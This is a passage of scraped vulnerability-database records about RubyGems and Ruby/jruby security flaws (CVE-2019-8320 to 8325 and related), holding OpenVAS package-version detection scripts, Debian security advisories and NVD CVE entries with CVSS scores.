could be leveraged to create an illegitimate certificate that may be accepted as legitimate and then used in signing or encryption operations.(CVE-2018-16395)\n\nAn issue was discovered in Ruby before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.2, and 2.6.x before 2.6.0-preview3. It does not taint strings that result from unpacking tainted strings with some formats.(CVE-2018-16396)\n\nAn issue was discovered in RubyGems 2.6 and later through 3.0.2. The gem owner command outputs the contents of the API response directly to stdout. Therefore, if the response is crafted, escape sequence injection may occur.(CVE-2019-8322)\n\nAn issue was discovered in RubyGems 2.6 and later through 3.0.2. Gem::GemcutterUtilities#with_response may output the API response to stdout as it is. Therefore, if the API side modifies the response, escape sequence injection may occur.(CVE-2019-8323)\n\nAn issue was discovered in RubyGems 2.6 and later through 3.0.2. A crafted gem with a multi-line name is not handled correctly. Therefore, an attacker could inject arbitrary code to the stub line of gemspec, which is eval-ed by code in ensure_loadable_spec during the preinstall check.(CVE-2019-8324)\n\nAn issue was discovered in RubyGems 2.6 and later through 3.0.2. Since Gem::CommandManager#run calls alert_error without escaping, escape sequence injection is possible. (There are many ways to cause an error.)(CVE-2019-8325)\");\n\n script_tag(name:\"affected\", value:\"'ruby' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.2.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.2.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.0.0.648~33.h13\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~2.0.0.648~33.h13\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~2.0.0.648~33.h13\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-bigdecimal\", rpm:\"rubygem-bigdecimal~1.2.0~33.h13\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-io-console\", rpm:\"rubygem-io-console~0.4.2~33.h13\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-json\", rpm:\"rubygem-json~1.7.7~33.h13\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-psych\", rpm:\"rubygem-psych~2.0.0~33.h13\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-rdoc\", rpm:\"rubygem-rdoc~4.0.0~33.h13\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygems\", rpm:\"rubygems~2.0.14.1~33.h13\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T19:25:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1000078", "CVE-2018-1000075", "CVE-2019-8325", "CVE-2018-1000076", "CVE-2018-1000074", "CVE-2019-8321", "CVE-2019-8323", "CVE-2018-1000077", "CVE-2019-8322", "CVE-2019-8324"], "description": "The remote host is missing an update for the ", "modified": "2020-01-29T00:00:00", "published": "2019-05-21T00:00:00", "id": "OPENVAS:1361412562310891796", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891796", "type": "openvas", "title": "Debian LTS: Security Advisory for jruby (DLA-1796-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891796\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-1000074\", \"CVE-2018-1000075\", \"CVE-2018-1000076\", \"CVE-2018-1000077\", \"CVE-2018-1000078\", \"CVE-2019-8321\", \"CVE-2019-8322\", \"CVE-2019-8323\", \"CVE-2019-8324\", \"CVE-2019-8325\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-05-21 02:00:23 +0000 (Tue, 21 May 2019)\");\n script_name(\"Debian LTS: Security Advisory for jruby (DLA-1796-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/05/msg00028.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1796-1\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/895778\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/925987\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jruby'\n package(s) announced via the DLA-1796-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in jruby, Java\nimplementation of the Ruby programming language.\n\nCVE-2018-1000074\n\nDeserialization of Untrusted Data vulnerability in owner command\nthat can result in code execution. This attack appear to be\nexploitable via victim must run the `gem owner` command on a gem\nwith a specially crafted YAML file\n\nCVE-2018-1000075\n\nan infinite loop caused by negative size vulnerability in ruby gem\npackage tar header that can result in a negative size could cause an\ninfinite loop\n\nCVE-2018-1000076\n\nImproper Verification of Cryptographic Signature vulnerability in\npackage.rb that can result in a mis-signed gem could be installed,\nas the tarball would contain multiple gem signatures.\n\nCVE-2018-1000077\n\nImproper Input Validation vulnerability in ruby gems specification\nhomepage attribute that can result in a malicious gem could set an\ninvalid homepage URL\n\nCVE-2018-1000078\n\nCross Site Scripting (XSS) vulnerability in gem server display of\nhomepage attribute that can result in XSS. This attack appear to be\nexploitable via the victim must browse to a malicious gem on a\nvulnerable gem server\n\nCVE-2019-8321\n\nGem::UserInteraction#verbose calls say without escaping, escape\nsequence injection is possible\n\nCVE-2019-8322\n\nThe gem owner command outputs the contents of the API response\ndirectly to stdout. Therefore, if the response is crafted, escape\nsequence injection may occur\n\nCVE-2019-8323\n\nGem::GemcutterUtilities#with_response may output the API response to\nstdout as it is. Therefore, if the API side modifies the response,\nescape sequence injection may occur.\n\nCVE-2019-8324\n\nA crafted gem with a multi-line name is not handled correctly.\nTherefore, an attacker could inject arbitrary code to the stub line\nof gemspec\n\nCVE-2019-8325\n\nGem::CommandManager#run calls alert_error without escaping, escape\nsequence injection is possible. (There are many ways to cause an\nerror.)\");\n\n script_tag(name:\"affected\", value:\"'jruby' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n1.5.6-9+deb8u1.\n\nWe recommend that you upgrade your jruby packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"jruby\", ver:\"1.5.6-9+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-01-11T01:18:21", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8320", "CVE-2019-8325", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "description": "Package : ruby2.1\nVersion : 2.1.5-2+deb8u7\nCVE ID : CVE-2019-8320 CVE-2019-8322 CVE-2019-8323 CVE-2019-8324\n CVE-2019-8325\n\n\nSeveral vulnerabilities have been discovered in rubygems embedded in\nruby2.1, the interpreted scripting language.\n\nCVE-2019-8320\n\n A Directory Traversal issue was discovered in RubyGems. Before\n making new directories or touching files (which now include\n path-checking code for symlinks), it would delete the target\n destination.\n\nCVE-2019-8322\n\n The gem owner command outputs the contents of the API response\n directly to stdout. Therefore, if the response is crafted, escape\n sequence injection may occur.\n\nCVE-2019-8323\n\n Gem::GemcutterUtilities#with_response may output the API response to\n stdout as it is. Therefore, if the API side modifies the response,\n escape sequence injection may occur.\n\nCVE-2019-8324\n\n A crafted gem with a multi-line name is not handled correctly.\n Therefore, an attacker could inject arbitrary code to the stub line\n of gemspec, which is eval-ed by code in ensure_loadable_spec during\n the preinstall check.\n\nCVE-2019-8325\n\n An issue was discovered in RubyGems 2.6 and later through 3.0.2.\n Since Gem::CommandManager#run calls alert_error without escaping,\n escape sequence injection is possible. (There are many ways to cause\n an error.)\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n2.1.5-2+deb8u7.\n\nWe recommend that you upgrade your ruby2.1 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 10, "modified": "2019-03-29T08:53:22", "published": "2019-03-29T08:53:22", "id": "DEBIAN:DLA-1735-1:A1848", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201903/msg00037.html", "title": "[SECURITY] [DLA 1735-1] ruby2.1 security update", "type": "debian", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2020-08-12T00:51:09", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8320", "CVE-2019-8325", "CVE-2019-8321", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4433-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nApril 16, 2019 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : ruby2.3\nCVE ID : CVE-2019-8320 CVE-2019-8321 CVE-2019-8322 CVE-2019-8323 \n CVE-2019-8324 CVE-2019-8325\n\nSeveral vulnerabilities have been discovered in the Rubygems included in\nthe interpreter for the Ruby language, which may result in denial of\nservice or the execution of arbitrary code.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 2.3.3-1+deb9u6.\n\nWe recommend that you upgrade your ruby2.3 packages.\n\nFor the detailed security status of ruby2.3 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/ruby2.3\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 10, "modified": "2019-04-16T20:57:46", "published": "2019-04-16T20:57:46", "id": "DEBIAN:DSA-4433-1:2DFCF", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2019/msg00077.html", "title": "[SECURITY] [DSA 4433-1] ruby2.3 security update", "type": "debian", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2020-08-17T00:55:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-17742", "CVE-2019-8320", "CVE-2019-8325", "CVE-2019-8321", "CVE-2019-8323", "CVE-2019-16255", "CVE-2019-16254", "CVE-2019-16201", "CVE-2019-8322", "CVE-2019-8324"], "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2330-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ \nAugust 16, 2020 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : jruby\nVersion : 1.7.26-1+deb9u2\nCVE ID : CVE-2017-17742 CVE-2019-8320 CVE-2019-8321 CVE-2019-8322 \n CVE-2019-8323 CVE-2019-8324 CVE-2019-8325 CVE-2019-16201 \n CVE-2019-16254 CVE-2019-16255\nDebian Bug : 925987\n\nSeveral vulnerabilities were fixed in JRuby,\na 100% pure-Java implementation of Ruby.\n\nCVE-2017-17742\nCVE-2019-16254\n\n HTTP Response Splitting attacks in the HTTP server of WEBrick.\n\nCVE-2019-16201\n\n Regular Expression Denial of Service vulnerability of WEBrick's \n Digest access authentication.\n\nCVE-2019-8320\n\n Delete directory using symlink when decompressing tar.\n\nCVE-2019-8321\n\n Escape sequence injection vulnerability in verbose.\n\nCVE-2019-8322\n\n Escape sequence injection vulnerability in gem owner.\n\nCVE-2019-8323\n\n Escape sequence injection vulnerability in API response handling.\n\nCVE-2019-8324\n\n Installing a malicious gem may lead to arbitrary code execution.\n\nCVE-2019-8325\n\n Escape sequence injection vulnerability in errors.\n\nCVE-2019-16255\n\n Code injection vulnerability of Shell#[] and Shell#test.\n\nFor Debian 9 stretch, these problems have been fixed in version\n1.7.26-1+deb9u2.\n\nWe recommend that you upgrade your jruby packages.\n\nFor the detailed security status of jruby please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/jruby\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 1, "modified": "2020-08-16T13:13:28", "published": "2020-08-16T13:13:28", "id": "DEBIAN:DLA-2330-1:B8DE4", "href": "https://lists.debian.org/debian-lts-announce/2020/debian-lts-announce-202008/msg00027.html", "title": "[SECURITY] [DLA 2330-1] jruby security update", "type": "debian", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2019-05-30T02:22:21", "bulletinFamily": "unix", "cvelist": ["CVE-2018-1000078", "CVE-2018-1000075", "CVE-2019-8325", "CVE-2018-1000076", "CVE-2018-1000074", "CVE-2019-8321", "CVE-2019-8323", "CVE-2018-1000077", "CVE-2019-8322", "CVE-2019-8324"], "description": "Package : jruby\nVersion : 1.5.6-9+deb8u1\nCVE ID : CVE-2018-1000074 CVE-2018-1000075 CVE-2018-1000076\n CVE-2018-1000077 CVE-2018-1000078 CVE-2019-8321\n CVE-2019-8322 CVE-2019-8323 CVE-2019-8324 CVE-2019-8325\nDebian Bug : 895778 925987\n\n\nMultiple vulnerabilities have been discovered in jruby, Java\nimplementation of the Ruby programming language.\n\nCVE-2018-1000074\n\n Deserialization of Untrusted Data vulnerability in owner command\n that can result in code execution. This attack appear to be\n exploitable via victim must run the `gem owner` command on a gem\n with a specially crafted YAML file\n\nCVE-2018-1000075\n\n an infinite loop caused by negative size vulnerability in ruby gem\n package tar header that can result in a negative size could cause an\n infinite loop\n\nCVE-2018-1000076\n\n Improper Verification of Cryptographic Signature vulnerability in\n package.rb that can result in a mis-signed gem could be installed,\n as the tarball would contain multiple gem signatures.\n\nCVE-2018-1000077\n\n Improper Input Validation vulnerability in ruby gems specification\n homepage attribute that can result in a malicious gem could set an\n invalid homepage URL\n\nCVE-2018-1000078\n\n Cross Site Scripting (XSS) vulnerability in gem server display of\n homepage attribute that can result in XSS. This attack appear to be\n exploitable via the victim must browse to a malicious gem on a\n vulnerable gem server\n\nCVE-2019-8321\n\n Gem::UserInteraction#verbose calls say without escaping, escape\n sequence injection is possible\n\nCVE-2019-8322\n\n The gem owner command outputs the contents of the API response\n directly to stdout. Therefore, if the response is crafted, escape\n sequence injection may occur\n\nCVE-2019-8323\n\n Gem::GemcutterUtilities#with_response may output the API response to\n stdout as it is. Therefore, if the API side modifies the response,\n escape sequence injection may occur.\n\nCVE-2019-8324\n\n A crafted gem with a multi-line name is not handled correctly.\n Therefore, an attacker could inject arbitrary code to the stub line\n of gemspec\n\nCVE-2019-8325\n\n Gem::CommandManager#run calls alert_error without escaping, escape\n sequence injection is possible. (There are many ways to cause an\n error.)\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n1.5.6-9+deb8u1.\n\nWe recommend that you upgrade your jruby packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 2, "modified": "2019-05-20T11:07:17", "published": "2019-05-20T11:07:17", "id": "DEBIAN:DLA-1796-1:B8D0E", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201905/msg00028.html", "title": "[SECURITY] [DLA 1796-1] jruby security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2020-12-09T21:41:57", "description": "A Directory Traversal issue was discovered in RubyGems 2.7.6 and later through 3.0.2. Before making new directories or touching files (which now include path-checking code for symlinks), it would delete the target destination. If that destination was hidden behind a symlink, a malicious gem could delete arbitrary files on the user's machine, presuming the attacker could guess at paths. Given how frequently gem is run as sudo, and how predictable paths are on modern systems (/tmp, /usr, etc.), this could likely lead to data loss or an unusable system.", "edition": 10, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2019-06-06T15:29:00", "title": "CVE-2019-8320", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 9.2, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8320"], "modified": "2020-08-16T15:15:00", "cpe": ["cpe:/a:rubygems:rubygems:3.0.2"], "id": "CVE-2019-8320", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-8320", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}, "cpe23": ["cpe:2.3:a:rubygems:rubygems:3.0.2:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T21:41:57", "description": "An issue was discovered in RubyGems 2.6 and later through 3.0.2. Gem::GemcutterUtilities#with_response may output the API response to stdout as it is. Therefore, if the API side modifies the response, escape sequence injection may occur.", "edition": 9, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-06-17T20:15:00", "title": "CVE-2019-8323", "type": "cve", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8323"], "modified": "2020-08-19T19:00:00", "cpe": ["cpe:/o:opensuse:leap:15.0", "cpe:/o:opensuse:leap:15.1", "cpe:/a:rubygems:rubygems:3.0.2", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2019-8323", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-8323", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T21:41:57", "description": "An issue was discovered in RubyGems 2.6 and later through 3.0.2. A crafted gem with a multi-line name is not handled correctly. Therefore, an attacker could inject arbitrary code to the stub line of gemspec, which is eval-ed by code in ensure_loadable_spec during the preinstall check.", "edition": 11, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-17T19:15:00", "title": "CVE-2019-8324", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8324"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:opensuse:leap:15.0", "cpe:/o:opensuse:leap:15.1", "cpe:/o:redhat:enterprise_linux:8.0", "cpe:/a:rubygems:rubygems:3.0.2", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2019-8324", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-8324", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T21:41:57", "description": "An issue was discovered in RubyGems 2.6 and later through 3.0.2. The gem owner command outputs the contents of the API response directly to stdout. Therefore, if the response is crafted, escape sequence injection may occur.", "edition": 9, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-06-17T20:15:00", "title": "CVE-2019-8322", "type": "cve", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8322"], "modified": "2020-08-19T19:00:00", "cpe": ["cpe:/o:opensuse:leap:15.0", "cpe:/o:opensuse:leap:15.1", "cpe:/a:rubygems:rubygems:3.0.2", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2019-8322", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-8322", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T21:41:57", "description": "An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since Gem::CommandManager#run calls alert_error without escaping, escape sequence injection is possible. (There are many ways to cause an error.)", "edition": 9, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-06-17T19:15:00", "title": "CVE-2019-8325", "type": "cve", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8325"], "modified": "2020-08-19T19:01:00", "cpe": ["cpe:/o:opensuse:leap:15.0", "cpe:/o:opensuse:leap:15.1", "cpe:/a:rubygems:rubygems:3.0.2", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2019-8325", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-8325", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*"]}], "amazon": [{"lastseen": "2020-11-10T12:35:39", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8320", "CVE-2019-8325", "CVE-2019-8321", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "description": "**Issue Overview:**\n\nAn issue was discovered in RubyGems. The gem owner command outputs the contents of the API response directly to stdout. Therefore, if the response is crafted, escape sequence injection may occur.([CVE-2019-8322 __](<https://access.redhat.com/security/cve/CVE-2019-8322>))\n\nAn issue was discovered in RubyGems. Gem::GemcutterUtilities#with_response may output the API response to stdout as it is. Therefore, if the API side modifies the response, escape sequence injection may occur.([CVE-2019-8323 __](<https://access.redhat.com/security/cve/CVE-2019-8323>))\n\nAn issue was discovered in RubyGems. Since Gem::UserInteraction#verbose calls say without escaping, escape sequence injection is possible.([CVE-2019-8321 __](<https://access.redhat.com/security/cve/CVE-2019-8321>))\n\nA Directory Traversal issue was discovered in RubyGems. Before making new directories or touching files (which now include path-checking code for symlinks), it would delete the target destination. If that destination was hidden behind a symlink, a malicious gem could delete arbitrary files on the 